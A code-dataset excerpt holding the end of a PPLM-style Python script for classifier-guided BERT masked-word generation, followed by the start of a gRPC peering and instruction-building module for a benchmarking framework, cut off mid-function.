verbosity_level=REGULAR\n):\n context_t = torch.tensor(context, device=device, dtype=torch.long)\n while len(context_t.shape) < 2:\n context_t = context_t.unsqueeze(0)\n output_so_far = context_t\n # collect one hot vectors for bags of words\n one_hot_bows_vectors = build_bows_one_hot_vectors(bow_indices, tokenizer,device)\n grad_norms = None\n last = None\n unpert_discrim_loss = 0\n loss_in_time = []\n\n # if verbosity_level >= VERBOSE:\n # range_func = trange(len(masked_indices), ascii=True)\n # else:\n # range_func = range(len(masked_indices))\n\n # for now, predict all the masked words at the same time\n # Get past/probs for current output, except for last word\n # Note that GPT takes 2 inputs: past + current_token\n # run model forward to obtain unperturbed\n \n if all_hidden is None and output_so_far is not None:\n #if there is some context\n if output_so_far.shape[1] > 1:\n _, _,all_hidden = model(input_ids = output_so_far, masked_lm_labels = masked_lm_labels)\n # sequence_output, pooled_output, (hidden_states), (attentions)\n unpert_mlm_loss, unpert_pred_logits, unpert_all_hidden = model(input_ids = context_t, masked_lm_labels = masked_lm_labels)\n # unpert_all_hidden : 12+1 layers, [1,sent_len,768]\n # get the last layer, this will be used for prediction and calc loss\n unpert_hidden_ll = unpert_all_hidden[-1]\n\n #finished unperturbed outputing\n # check if we are abowe grad max length\n # if i >= grad_length:\n # current_stepsize = stepsize * 0\n # else:\n # current_stepsize = stepsize\n current_stepsize = stepsize\n # modify the past if necessary\n if not perturb or num_iterations == 0:\n pert_all_hidden = unpert_all_hidden\n\n else:\n #TODO fix this\n if all_hidden is not None:\n pert_all_hidden, _, grad_norms, loss_this_iter = perturb_hidden_bert(\n all_hidden,\n model,\n masked= None,\n context = context_t,\n masked_lm_labels= masked_lm_labels,\n unpert_all_hidden=unpert_all_hidden,\n unpert_logits=unpert_pred_logits,\n grad_norms=grad_norms,\n stepsize=current_stepsize,\n one_hot_bows_vectors=one_hot_bows_vectors,\n classifier=classifier,\n class_label=class_label,\n loss_type=loss_type,\n num_iterations=num_iterations,\n horizon_length=horizon_length,\n decay=decay,\n gamma=gamma,\n kl_scale=kl_scale,\n device=device,\n verbosity_level=verbosity_level\n )\n loss_in_time.append(loss_this_iter)\n # else:\n # pert_past = past\n #feed the perturbed hidden representations to the model and get new hidden representations\n # Oh no, we need to feed the hidden representations instead of input ids to the model!!!! Argh!\n last_hidden = pert_all_hidden[-1]\n pert_logits = model.cls(last_hidden)\n pert_probs = F.softmax(pert_logits, dim=-1)\n # pert_mlm_loss, pert_pred_logits, pert_all_hidden = model(input_ids = context_t, masked_lm_labels = masked_lm_labels)\n ###here only take the last logit as the output\n pert_logits = pert_logits[0] / temperature # + SMALL_CONST\n pert_probs = F.softmax(pert_logits, dim=-1)\n\n if classifier is not None:\n ce_loss = torch.nn.CrossEntropyLoss()\n prediction = classifier(torch.mean(unpert_hidden_ll, dim=1))\n label = torch.tensor([class_label], device=device,\n dtype=torch.long)\n unpert_discrim_loss = ce_loss(prediction, label)\n if verbosity_level >= VERBOSE:\n print(\n \"unperturbed discrim loss\",\n unpert_discrim_loss.data.cpu().numpy()\n )\n else:\n unpert_discrim_loss = 0\n\n # Fuse the modified model and original model\n if perturb:\n\n unpert_probs = F.softmax(unpert_pred_logits[0], dim=-1)\n\n pert_probs = ((pert_probs ** gm_scale) * (\n unpert_probs ** (1 - gm_scale))) # + SMALL_CONST\n pert_probs = top_k_filter(pert_probs, k=top_k,\n probs=True) # + SMALL_CONST\n\n # rescale\n if torch.sum(pert_probs) <= 1:\n pert_probs = pert_probs / torch.sum(pert_probs)\n\n else:\n pert_logits = top_k_filter(pert_logits, k=top_k) # + SMALL_CONST\n pert_probs = F.softmax(pert_logits, dim=-1)\n\n # sample or greedy\n # TODO Actually we might not need to sample the actual words, but just take the representations.\n if sample:\n prediction = torch.multinomial(pert_probs, num_samples=1)\n\n else:\n _, prediction = torch.topk(pert_probs, k=2, dim=-1)\n\n output_so_far = [context[i] if masked_lm_labels[0][i].item() == -100 else prediction[i].item() for i in range(len(context))]\n if verbosity_level >= REGULAR:\n print(tokenizer.decode(output_so_far))\n\n return output_so_far, unpert_discrim_loss, loss_in_time\n\ndef set_generic_model_params(discrim_weights, discrim_meta):\n if discrim_weights is None:\n raise ValueError('When using a generic discriminator, '\n 'discrim_weights need to be specified')\n if discrim_meta is None:\n raise ValueError('When using a generic discriminator, '\n 'discrim_meta need to be specified')\n\n with open(discrim_meta, 'r') as discrim_meta_file:\n meta = json.load(discrim_meta_file)\n meta['path'] = discrim_weights\n DISCRIMINATOR_MODELS_PARAMS['generic'] = meta\n\ndef get_classifier(\n name: Optional[str],\n class_label: Union[str, int],\n device: str,\n verbosity_level: int = REGULAR\n) -> Tuple[Optional[ClassificationHead], Optional[int]]:\n if name is None:\n return None, None\n\n params = DISCRIMINATOR_MODELS_PARAMS[name]\n classifier = ClassificationHead(\n class_size=params['class_size'],\n embed_size=params['embed_size']\n ).to(device)\n if \"url\" in params:\n resolved_archive_file = cached_path(params[\"url\"])\n elif \"path\" in params:\n resolved_archive_file = params[\"path\"]\n else:\n raise ValueError(\"Either url or path have to be specified \"\n \"in the discriminator model parameters\")\n classifier.load_state_dict(\n torch.load(resolved_archive_file, map_location=device))\n classifier.eval()\n\n if isinstance(class_label, str):\n if class_label in params[\"class_vocab\"]:\n label_id = params[\"class_vocab\"][class_label]\n else:\n label_id = params[\"default_class\"]\n if verbosity_level >= REGULAR:\n print(\"class_label {} not in class_vocab\".format(class_label))\n print(\"available values are: {}\".format(params[\"class_vocab\"]))\n print(\"using default class {}\".format(label_id))\n\n elif isinstance(class_label, int):\n if class_label in set(params[\"class_vocab\"].values()):\n label_id = class_label\n else:\n label_id = params[\"default_class\"]\n if verbosity_level >= REGULAR:\n print(\"class_label {} not in class_vocab\".format(class_label))\n print(\"available values are: {}\".format(params[\"class_vocab\"]))\n print(\"using default class {}\".format(label_id))\n\n else:\n label_id = params[\"default_class\"]\n\n return classifier, label_id\n\ndef get_score(token_ids, model, classifier, device):\n token_ids_tensor = torch.tensor(token_ids, dtype=torch.long).unsqueeze(0).to(device)\n _,all_hidden = model(input_ids = token_ids_tensor)\n accumulated_hidden = all_hidden[-1].sum(1)[0]\n sentence_length = len(all_hidden)\n prob = F.softmax(classifier(accumulated_hidden / sentence_length))\n score = [p.item() for p in prob]\n return score\n\n\ndef selective_mask(raw_text, mask_prob, model, tokenizer, classifier, class_id, device, strategy = 'pick_best'):\n # The goal is to mask our tokens to maximize the prob of the class_id\n tokens = tokenizer.tokenize(raw_text)\n #Notice that len(token_ids) = len(tokens) + 2\n token_ids = tokenizer.encode(raw_text) \n sentence_length = len(token_ids)\n #at least mask out 1 token\n mask_num = max(int(mask_prob * (sentence_length - 2)), 1)\n scores = []\n curr_tokens = tokens \n curr_token_ids = token_ids \n curr_score = None\n masked_indices = []\n \n init_score = get_score(token_ids, model, classifier, device)\n if strategy == 'iterative':\n print (tokens)\n for i in range(mask_num):\n # print ('Masking the {}th token of all {} tokens to be masked.'.format(i, mask_num))\n curr_token_ids_tensor = torch.tensor(curr_token_ids, dtype=torch.long).unsqueeze(0).to(device)\n _,all_hidden = model(input_ids = curr_token_ids_tensor)\n if curr_score is None:\n curr_score = init_score\n all_new_probs = []\n for tok_no, tok in enumerate(curr_tokens):\n if tok == '[MASK]' or tok in [',', '.', ':',';', '?', '!']:\n all_new_probs.append(-1000)\n continue\n #iteratively mask out each tok and see how the score changes\n masked_token_ids = curr_token_ids.copy()\n #plus one because token\n masked_token_ids[tok_no + 1] = tokenizer.mask_token_id\n new_score = get_score(masked_token_ids, model, classifier, device)\n all_new_probs.append(new_score[class_id])\n diff = new_score[class_id] - curr_score[class_id]\n # print ('{} , newprob {}, diff = {}'.format(tok, new_score, diff))\n best_tok_id = np.argmax(all_new_probs)\n #TODO needs fixing\n masked_score = all_new_probs[best_tok_id]\n # print ('Masking out \"{}\" '.format(curr_tokens[best_tok_id]))\n curr_tokens[best_tok_id] = '[MASK]'\n curr_token_ids[best_tok_id + 1] = tokenizer.mask_token_id\n #added 1 here\n masked_indices.append(best_tok_id +1)\n # print ('After masking --- \"{}\" '.format(' '.join(curr_tokens)) )\n # print ('masked_indices: {} '.format(masked_indices) )\n \n elif strategy == 'pick_best':\n num_reinit = 10\n # re init several times, each time mask out same amount of words, \n # pick the sentence with the highest score of the target class?\n # or lowest score for the initial class?\n all_score, all_masked_indices = [],[]\n for _ in range(num_reinit):\n curr_token_ids = token_ids.copy()\n masked_indices_cand = np.random.choice(range(len(tokens)), mask_num)\n all_masked_indices.append(masked_indices_cand)\n for m_id in masked_indices_cand:\n curr_token_ids[m_id + 1] = tokenizer.mask_token_id\n print (curr_token_ids)\n new_score = get_score(curr_token_ids, model, classifier, device)\n all_score.append(new_score)\n best_ind = np.argmax([s[class_id] for s in all_score ])\n masked_indices = all_masked_indices[best_ind]\n #add 1 to acount for the fact that there is the [cls] token\n masked_indices = [m + 1 for m in masked_indices]\n masked_score = all_score[best_ind]\n \n return masked_indices, init_score, masked_score\n\ndef run_pplm_example_bert(\n pretrained_model=\"bert-base-cased\",\n mask_prob = 0.5,\n do_selective_mask = True,\n cond_text=\"\",\n num_samples=1,\n bag_of_words=None,\n discrim=None,\n discrim_weights=None,\n discrim_meta=None,\n class_label=-1,\n length=100,\n stepsize=0.02,\n temperature=1.0,\n top_k=10,\n sample=True,\n num_iterations=3,\n grad_length=10000,\n horizon_length=1,\n decay=False,\n gamma=1.5,\n gm_scale=0.9,\n kl_scale=0.01,\n seed=0,\n no_cuda=False,\n colorama=False,\n strategy = 'pick_best',\n verbosity='regular',\n return_sent = False\n):\n ##This is the main function for bert\n\n # set Random seed\n torch.manual_seed(seed)\n np.random.seed(seed)\n\n # set verbosiry\n verbosity_level = VERBOSITY_LEVELS.get(verbosity.lower(), REGULAR)\n\n # set the device\n device = \"cuda\" if torch.cuda.is_available() and not no_cuda else \"cpu\"\n\n ###set discriminator? TODO need to figure this part out. where is this used\n #Modifies the global variables\n if discrim == 'generic':\n set_generic_model_params(discrim_weights, discrim_meta)\n if discrim is not None:\n discriminator_pretrained_model = DISCRIMINATOR_MODELS_PARAMS[discrim][\n \"pretrained_model\"\n ]\n if pretrained_model != discriminator_pretrained_model:\n pretrained_model = discriminator_pretrained_model\n if verbosity_level >= REGULAR:\n print(\"discrim = {}, pretrained_model set \"\n \"to discriminator's = {}\".format(discrim, pretrained_model))\n\n # load pretrained model\n model = BertForMaskedLM.from_pretrained(\n pretrained_model,\n output_hidden_states=True\n )\n model.to(device)\n model.eval()\n\n # load tokenizer\n tokenizer = BertTokenizer.from_pretrained(pretrained_model)\n\n # Freeze Bert weights\n #!! this is interesting, i should also do this for my code.\n for param in model.parameters():\n param.requires_grad = False\n\n # figure out conditioning text\n # if uncond, use start of sentence as the prompt\n # we need to change this into a whole sentence\n \n raw_text = cond_text\n\n while not raw_text:\n print(\"Did you forget to add `--cond_text`? \")\n raw_text = input(\"Model prompt >>> \")\n ##Different: we are also adding eos token now (as opposed to only bos)\n tokenized_cond_text = tokenizer.encode(raw_text)\n\n print(\"= Original sentence =\")\n print(tokenizer.decode(tokenized_cond_text))\n print()\n #randomly mask out a certain percentage of tokens or do_selective\n sent_len = len(tokenized_cond_text)-2\n # masked_indices = np.random.choice( range(1, len(tokenized_cond_text)-1), int(sent_len * mask_prob))\n\n #add a function to mask out indices that \n if discrim is not None and do_selective_mask:\n classifier, class_id = get_classifier( discrim, class_label, device )\n masked_indices, init_score, masked_score = selective_mask(raw_text, mask_prob, model, tokenizer, classifier, class_id, device, strategy)\n orig_scores = [init_score, masked_score, ]\n\n # masked_indices = np.array([5,6,7])\n \n # get the mask labels\n # Fuck they changed the ignore_index!!!!\n masked_lm_labels = [[-100 for _ in range(len(tokenized_cond_text))]]\n for ind in masked_indices:\n masked_lm_labels[0][ind] = tokenized_cond_text[ind]\n masked_lm_labels = torch.tensor(masked_lm_labels, device=device, dtype=torch.long)\n for ind in masked_indices:\n tokenized_cond_text[ind] = tokenizer.convert_tokens_to_ids(tokenizer.mask_token)\n #PRINT the masked version of the input_text\n print (\"After masking\")\n masked_text = tokenizer.decode(tokenized_cond_text)\n print(masked_text)\n\n\n # generate unperturbed and perturbed texts\n\n # full_text_generation returns:\n # unpert_gen_tok_text, pert_gen_tok_texts, discrim_losses, losses_in_time\n # bert-completed sentence without perterbing \n unpert_gen_tok_text, pert_gen_tok_texts, _, _ = full_text_generation_bert(\n model=model,\n tokenizer=tokenizer,\n context=tokenized_cond_text,\n masked_indices = masked_indices,\n masked_lm_labels = masked_lm_labels,\n device=device,\n num_samples=num_samples,\n bag_of_words=bag_of_words,\n discrim=discrim,\n class_label=class_label,\n stepsize=stepsize,\n temperature=temperature,\n top_k=top_k,\n sample=sample,\n num_iterations=num_iterations,\n grad_length=grad_length,\n horizon_length=horizon_length,\n decay=decay,\n gamma=gamma,\n gm_scale=gm_scale,\n kl_scale=kl_scale,\n verbosity_level=verbosity_level\n )\n\n # untokenize unperturbed text\n print ('UNPERT\\n')\n unpert_gen_text = tokenizer.decode(unpert_gen_tok_text)\n\n if verbosity_level >= REGULAR:\n print(\"=\" * 80)\n print(\"= Unperturbed generated text =\")\n print(unpert_gen_text)\n print()\n\n generated_texts = []\n\n bow_word_ids = set()\n if bag_of_words and colorama:\n bow_indices = get_bag_of_words_indices_bert(bag_of_words.split(\";\"),\n tokenizer)\n for single_bow_list in bow_indices:\n # filtering all words in the list composed of more than 1 token\n filtered = list(filter(lambda x: len(x) <= 1, single_bow_list))\n # w[0] because we are sure w has only 1 item because previous fitler\n bow_word_ids.update(w[0] for w in filtered)\n # iterate through the perturbed texts\n for i, pert_gen_tok_text in enumerate(pert_gen_tok_texts):\n try:\n # untokenize unperturbed text\n if colorama:\n import colorama\n\n pert_gen_text = ''\n for word_id in pert_gen_tok_text.tolist()[0]:\n if word_id in bow_word_ids:\n pert_gen_text += '{}{}{}'.format(\n colorama.Fore.RED,\n tokenizer.decode([word_id]),\n colorama.Style.RESET_ALL\n )\n else:\n pert_gen_text += tokenizer.decode([word_id])\n else:\n pert_gen_text = tokenizer.decode(pert_gen_tok_text)\n\n print(\"= Perturbed generated text {} =\".format(i + 1))\n print(pert_gen_text)\n print()\n except:\n pass\n # keep the prefix, perturbed seq, original seq for each index\n # return should contain: masked sentence, pert_gen_text, unpert_gen_text\n # scores = [initial_score, score_after_masking, score_after_filling_in]\n new_score = get_score(pert_gen_tok_text, model, classifier, device)\n generated_texts.append(\n (pert_gen_text, unpert_gen_text, new_score)\n )\n if return_sent:\n return [masked_text, orig_scores, generated_texts]\n return\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--pretrained_model\",\n \"-M\",\n type=str,\n default=\"bert-base-cased\",\n help=\"pretrained model name or path to local checkpoint\",\n )\n parser.add_argument(\n \"--cond_text\", type=str, default=\"The lake\",\n help=\"Prefix texts to condition on\"\n )\n\n parser.add_argument(\n \"--num_samples\",\n type=int,\n default=1,\n help=\"Number of samples to generate from the modified latents\",\n )\n parser.add_argument(\n \"--bag_of_words\",\n \"-B\",\n type=str,\n default=None,\n help=\"Bags of words used for PPLM-BoW. \"\n \"Either a BOW id (see list in code) or a filepath. \"\n \"Multiple BoWs separated by ;\",\n )\n parser.add_argument(\n \"--discrim\",\n \"-D\",\n type=str,\n default=None,\n choices=(\"clickbait\", \"sentiment\", \"toxicity\", \"generic\"),\n help=\"Discriminator to use\",\n )\n parser.add_argument('--discrim_weights', type=str, default=None,\n help='Weights for the generic discriminator')\n parser.add_argument('--discrim_meta', type=str, default=None,\n help='Meta information for the generic discriminator')\n parser.add_argument(\n \"--class_label\",\n type=int,\n default=-1,\n help=\"Class label used for the discriminator\",\n )\n parser.add_argument(\"--length\", type=int, default=100)\n parser.add_argument(\"--stepsize\", type=float, default=0.02)\n parser.add_argument(\"--temperature\", type=float, default=1.0)\n parser.add_argument(\"--top_k\", type=int, default=10)\n parser.add_argument(\n \"--sample\", action=\"store_true\",\n help=\"Generate from end-of-text as prefix\"\n #what does this mean??\n )\n parser.add_argument(\"--num_iterations\", type=int, default=3)\n parser.add_argument(\"--grad_length\", type=int, default=10000)\n # parser.add_argument(\n # \"--window_length\",\n # type=int,\n # default=0,\n # help=\"Length of past which is being optimized; \"\n # \"0 corresponds to infinite window length\",\n # )\n parser.add_argument(\n \"--horizon_length\",\n type=int,\n default=1,\n help=\"Length of future to optimize over\",\n )\n parser.add_argument(\"--decay\", action=\"store_true\",\n help=\"whether to decay or not\")\n parser.add_argument(\"--gamma\", type=float, default=1.5)\n parser.add_argument(\"--gm_scale\", type=float, default=0.9)\n parser.add_argument(\"--kl_scale\", type=float, default=0.01)\n parser.add_argument(\"--seed\", type=int, default=0)\n parser.add_argument(\"--no_cuda\", action=\"store_true\", help=\"no cuda\")\n parser.add_argument(\"--colorama\", action=\"store_true\",\n help=\"colors keywords\")\n parser.add_argument(\"--verbosity\", type=str, default=\"very_verbose\",\n choices=(\n \"quiet\", \"regular\", \"verbose\", \"very_verbose\"),\n help=\"verbosiry level\")\n\n parser.add_argument(\"--strategy\", type=str, default='pick_best')\n \n\n args = parser.parse_args()\n run_pplm_example_bert(**vars(args))\n","sub_path":"run_pplm_bert.py","file_name":"run_pplm_bert.py","file_ext":"py","file_size_in_byte":37842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"75861143","text":"import json\nimport asyncio\nimport logging\nfrom datetime import datetime\n\nfrom grpclib.client import Channel\nfrom grpclib.exceptions import GRPCError\n\nfrom google.protobuf import json_format\n\nfrom gym.common.status import Status\nfrom gym.common.tools import Tools\n\nfrom gym.common.protobuf.gym_grpc import (\n AgentStub,\n MonitorStub,\n ManagerStub,\n PlayerStub,\n InfraStub,\n)\nfrom gym.common.protobuf.gym_pb2 import (\n Result,\n Task,\n Report,\n Instruction,\n Action,\n Snapshot,\n Info,\n Deploy,\n)\n\nfrom gym.common.vnfbr import VNFBR\nfrom gym.common.vnfbd import VNFBD\nfrom gym.common.vnfpp import VNFPP\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Core:\n def __init__(self, info):\n self.status = Status(info)\n asyncio.create_task(self.greet(info, startup=True))\n\n async def _reach(self, stub, contacts=[]):\n \"\"\"Reaches a stub using the Greet gRPC service call\n handling the info message back into a dict\n\n Arguments:\n stub {gRPC stub/client} -- A gRPC stub that interfaces\n the info function call in a remote peer\n\n Keyword Arguments:\n contacts {list} -- The contacts that must be included\n in the info message, so the peer being contacted can\n reach this list of contacts and retrieve their info\n too (default: {[]})\n\n Returns:\n dict -- The info of the contacted peer to be used\n to build its Identity, and so be added to the peers\n database of the Core status\n \"\"\"\n profile = self.status.profile()\n info = json_format.ParseDict(profile, Info())\n\n if contacts:\n for contact in contacts:\n info.contacts.append(contact)\n\n try:\n reply = await stub.Greet(info)\n info_reply = json_format.MessageToDict(\n reply, preserving_proto_field_name=True\n )\n\n except GRPCError as e:\n logger.info(f\"Error in reaching: Greet Info\")\n logger.debug(f\"Exception in Greet: {e}\")\n info_reply = {}\n\n except OSError as e:\n logger.info(f\"Could not reach channel for Greet Info\")\n logger.debug(f\"Exception: {e}\")\n info_reply = {}\n\n finally:\n return info_reply\n\n async def _contact(self, role, host, port, contacts=[]):\n \"\"\"Establishes the contact with a remote peer having\n the provided role (to be able to build the proper stub) at the\n specified host:port params.\n\n Arguments:\n role {string} -- Role of the peer being contacted\n host {string} -- IP address of the peer being contacted\n port {string} -- Port address of the peer being contacted\n\n Keyword Arguments:\n contacts {list} -- List of contacts the peer being contact\n must also greet and retrieve info (default: {[]})\n \"\"\"\n stubs = {\n \"agent\": AgentStub,\n \"monitor\": MonitorStub,\n \"manager\": ManagerStub,\n \"player\": PlayerStub,\n }\n\n channel = Channel(host, port)\n stub_class = stubs.get(role, None)\n\n if stub_class:\n logger.info(f\"Contacting {role} at {host}:{port}\")\n stub = stub_class(channel)\n info = await self._reach(stub, contacts)\n\n if info:\n self.status.add_peer(info)\n else:\n logger.info(f\"Could not contact {host}:{port}\")\n else:\n logger.info(f\"Could not contact role {role} - \" f\"no stub/client available\")\n\n channel.close()\n\n async def greet(self, info, startup=False):\n \"\"\"Establishes peering with a contact (another gym component)\n that has the provided fields defined by the info param\n At startup waits a bit so agent/monitor can load its tools\n before greetings.\n\n Arguments:\n info {dict} -- Set of information that enables a contact\n to be reached and become a peer\n\n Keyword Arguments:\n startup {bool} -- A flag that signs if the App is\n in startup mode. This function can be called to reach\n contacts in run-time too. (default: {False})\n \"\"\"\n if startup:\n await asyncio.sleep(0.5)\n\n contacts = info.get(\"contacts\")\n allowed_contacts = self.status.allows(contacts)\n\n if allowed_contacts:\n logger.info(f\"Greeting contacts: {allowed_contacts}\")\n\n for contact in allowed_contacts:\n role, address = contact.split(\"/\")\n host, port = address.split(\":\")\n contacts_peers = info.get(\"peers\")\n await self._contact(role, host, port, contacts_peers)\n else:\n logger.info(f\"No greetings, contacts empty: {allowed_contacts}\")\n\n if startup:\n logger.info(f\"Ready!\")\n\n async def info(self, message):\n \"\"\"This function is called every time a gym component\n receives an Info gRPC service call. So it adds the peer to its\n database, and if the message contains contacts, it tries to\n greet those contacts before replying the Info.\n In summary, gym components exchange Info messages to\n establish peering, i.e., their add the peer info to its\n peers database.\n\n Arguments:\n message {Info} -- An Info type of gRPC message containing\n the info about the peer that is contacting/calling\n\n Returns:\n Info -- An Info type of gRPC message containing the profile\n information of this peer to be sent to the other peer.\n \"\"\"\n logger.info(\"Received Info\")\n logger.debug(f\"{json_format.MessageToJson(message)}\")\n info = json_format.MessageToDict(message, preserving_proto_field_name=True)\n\n await self.greet(info)\n\n self.status.add_peer(info)\n reply = Info()\n profile = self.status.profile()\n reply = json_format.ParseDict(profile, Info())\n\n logger.info(\"Replying Info\")\n logger.debug(f\"{json_format.MessageToJson(reply)}\")\n\n return reply\n\n\nclass WorkerCore(Core):\n \"\"\"It is the base class of Agent and Monitor.\n So it contains an instance of Tools that can\n load and run probers/listeners.\n\n Arguments:\n Core {class} -- Agent and Monitor contain all the\n behavior of a Core component (i.e., peer\n with each other exchanging Info messages)\n \"\"\"\n\n def __init__(self, info):\n self.tools = Tools()\n asyncio.create_task(self.load_tools(info))\n Core.__init__(self, info)\n\n def _build_cfg(self, info):\n \"\"\"Build the dict config that enables\n the tools (probers or listeners) to be loaded\n from a specific folder\n\n Arguments:\n info {dict} -- Contains the folder and the role\n of the Agent/Monitor that is loading the tools\n\n Returns:\n dict -- The set of needed information for the\n probers or listener to be loaded into the tools\n available.\n \"\"\"\n folder = info.get(\"folder\")\n role = info.get(\"role\")\n\n if role == \"monitor\":\n prefix = \"listener_\"\n name = \"listeners\"\n elif role == \"agent\":\n prefix = \"prober_\"\n name = \"probers\"\n else:\n prefix = None\n name = None\n\n if prefix:\n tools_cfg = {\n \"name\": name,\n \"folder\": folder,\n \"prefix\": prefix,\n \"suffix\": \"py\",\n \"full_path\": True,\n }\n else:\n tools_cfg = {}\n\n return tools_cfg\n\n def _update_status(self, tools_cfg):\n \"\"\"After loading the tools, their information\n is stored in the artifacts of a Agent/Monitor\n status (Identity instance)\n\n Arguments:\n tools_cfg {dict} -- Contains the name of the\n tools to be stored in the artifacts.\n I.e., probers or listeners\n \"\"\"\n tools = self.tools.info()\n artifacts = {\n tools_cfg.get(\"name\"): list(tools.values()),\n }\n self.status.set(\"artifacts\", artifacts)\n\n async def load_tools(self, info):\n \"\"\"Loads the tools (probers or listeners)\n based on the info provided\n\n Arguments:\n info {dict} -- Contains the role of the component\n (agent/monitor) and the folder where the tools are\n located\n \"\"\"\n tools_cfg = self._build_cfg(info)\n\n if tools_cfg:\n await self.tools.load(tools_cfg)\n self._update_status(tools_cfg)\n logger.info(f\"Loaded {info.get('role')} {tools_cfg.get('name')}\")\n\n else:\n logger.info(f\"Tools not loaded: unkown cfgs for {info.get('role')}\")\n\n def origin(self):\n \"\"\"Just returns the origin of a snapshot\n i.e., the information to be contained inside a snapshot\n that references where it was extracted (component uuid and role)\n\n Returns:\n dict -- Contains the component uuid and its role\n \"\"\"\n profile = self.status.profile()\n origin = {\n \"id\": profile.get(\"uuid\"),\n \"role\": profile.get(\"role\"),\n }\n return origin\n\n def snapshot(self, instruction, results):\n \"\"\"Builds a Snapshot (gRPC message) based on\n the results extracted from a Instruction (gRPC service call)\n\n Arguments:\n instruction {dict} -- References the information\n contained in the Instruction message that originated\n the results and the snapshot\n results {list} -- Set of evaluations output of\n tools running the actions contained in the Instruction\n service call\n\n Returns:\n Snapshot -- A gRPC Snapshot message, containing\n a timestamp, the origin of the snapshot, and its\n evaluations.\n \"\"\"\n logger.info(\"Creating Snapshot\")\n\n snapshot = Snapshot(id=instruction.get(\"id\"), trial=instruction.get(\"trial\"))\n\n snap = {\n \"origin\": self.origin(),\n \"evaluations\": results,\n \"timestamp\": datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\"),\n }\n\n snapshot = json_format.ParseDict(snap, snapshot)\n return snapshot\n\n async def instruction(self, message):\n \"\"\"This function is called when a Instruction\n gRPC service call is made to an Agent/Monitor.\n It executes the Instruction actions using the tools\n available.\n\n Arguments:\n message {Instruction} -- A Instruction gRPC message\n\n Returns:\n Snapshot -- A Snapshot gRPC message\n \"\"\"\n logger.info(\"Received Instruction\")\n logger.debug(f\"{json_format.MessageToJson(message)}\")\n\n instruction = json_format.MessageToDict(\n message, preserving_proto_field_name=True\n )\n\n actions = instruction.get(\"actions\")\n results = await self.tools.handle(actions)\n snapshot = self.snapshot(instruction, results)\n\n logger.info(f\"Replying Snapshot\")\n logger.debug(f\"{json_format.MessageToJson(snapshot)}\")\n return snapshot\n\n\nclass ManagerCore(Core):\n def __init__(self, info):\n Core.__init__(self, info)\n self.instructions_ids = 1001\n\n def actions(self, instruction, req_tools):\n \"\"\"Build the set of actions inside a intruction\n based on the tool id and parameters inside req_tools\n\n Arguments:\n instruction {Instruction} -- A gRPC message Instruction\n req_tools {list} -- List of tools (id, parameters, sched)\n \"\"\"\n logger.info(f\"Building actions\")\n logger.debug(f\"Tools: {req_tools}\")\n\n for tool in req_tools:\n action = instruction.actions.add()\n action.id = tool.id\n action.name = tool.name\n action.instance = tool.instance\n\n for k in tool.parameters:\n action.args[k] = tool.parameters[k]\n\n action.sched.CopyFrom(tool.sched)\n\n def instruction(self, req_peer, tools_type):\n \"\"\"Builds a gRPC message of type Instruction\n containing the actions for a specific peer uuid (req_peer)\n defined in the prober/listeners alocated to this peer\n\n Arguments:\n req_peer {dict} -- Contains a uuid and definitions of\n tools (probers or listeners) with parameters and values\n thath will be used to compose a Instruction\n tools_type {string} -- Defines the types of tools that\n the req_peer must contain (probers or listeners)\n\n Returns:\n tuple -- (Instruction, bool) A gRPC message of type\n Instruction and a bool indicating if the instruction was\n successfuly built or not\n \"\"\"\n instruction_built = False\n instruction = Instruction()\n\n if hasattr(req_peer, tools_type):\n req_tools = getattr(req_peer, tools_type, [])\n\n if req_tools:\n self.actions(instruction, req_tools)\n instruction_built = True\n\n return instruction, instruction_built\n\n def build_instructions(self, requested, tools_type):\n \"\"\"Builds a set of instructions for a particular set\n of peers (agents or monitors) and it tools_type (probers or listeners)\n\n Arguments:\n requested {list} -- Set of requests for particular peer uuids\n and its tools needed to build an Instruction\n tools_type {string} -- Defines if the tools type is probers or listeners\n\n Returns:\n tuple -- (dict, bool) A dict containing all the (indexed by uuid) set of\n Instructions (gRPC messages), and a bool defining if all those instructions\n that were requested were fulfilled\n \"\"\"\n instructions, instructions_built = {}, {}\n\n for req_peer in requested:\n instruction, instruction_built = self.instruction(req_peer, tools_type)\n\n req_uuid = getattr(req_peer, \"uuid\")\n\n if instruction_built:\n instructions_built[req_uuid] = True\n instructions[req_uuid] = instruction\n logger.info(f\"Instruction built for uuid {req_uuid}\")\n\n else:\n instructions_built[req_uuid] = False\n logger.info(\n f\"Instruction not built for uuid {req_uuid} - \"\n f\"Could not get tools type {tools_type}\"\n )\n\n logger.debug(f\"Status of instructions per requested uuid: {instructions_built}\")\n all_instructions_ok = all(instructions_built.values())\n\n return instructions, all_instructions_ok\n\n def check_uuids(self, locals, requested):\n \"\"\"Verifying if (requested) workers (agents/monitors)\n fit available components (locals)\n\n Arguments:\n locals {list} -- Set of available peer profiles of\n Agents and/or Monitors to which the instructions\n will be send when built\n requested {list} -- Set of requested instructions to be\n built for particuar Agents/Monitors\n\n Returns:\n bool -- If all uuids requested to build instructions\n match the available peers that Manager has to send\n those instructions\n \"\"\"\n logger.debug(\n \"Verifying if (requested) workers (agents/monitors) \"\n \"fit available components (locals)\"\n )\n\n local_ids = [peer_uuid for peer_uuid in locals]\n req_ids = [req.uuid for req in requested]\n\n for req_id in req_ids:\n if req_id not in local_ids:\n logger.debug(\n f\"Failed to check uuids - \"\n f\"Component requested uuid {req_id}\"\n f\"missing in peer uuids: {local_ids}\"\n )\n\n return False\n\n logger.debug(\"All uuids checked - requested match available uuids\")\n return True\n\n def instructions(self, locals, requested, role):\n \"\"\"Builds the instructions for a particular\n role, considering the available locals (peers)\n Agent/Monitors available to execute the instructions\n and the requested ones\n\n Arguments:\n locals {list} -- Set of available peer profiles of\n Agents and/or Monitors to which the instructions\n will be send when built\n requested {list} -- Set of requested instructions to be\n built for particuar Agents/Monitors\n role {string} -- Role of the components that the instructions\n will be built\n\n Returns:\n tuple -- (dict, bool) Set of instructions built and\n if all instructions were built correctly\n \"\"\"\n logger.info(f\"Building instructions for {role}\")\n\n instructions, all_instructions_ok = {}, False\n\n tools_name = {\"agents\": \"probers\", \"monitors\": \"listeners\"}\n tools_type = tools_name.get(role, None)\n\n if tools_type:\n if self.check_uuids(locals, requested):\n instructions, all_instructions_ok = self.build_instructions(\n requested, tools_type\n )\n\n if all_instructions_ok:\n 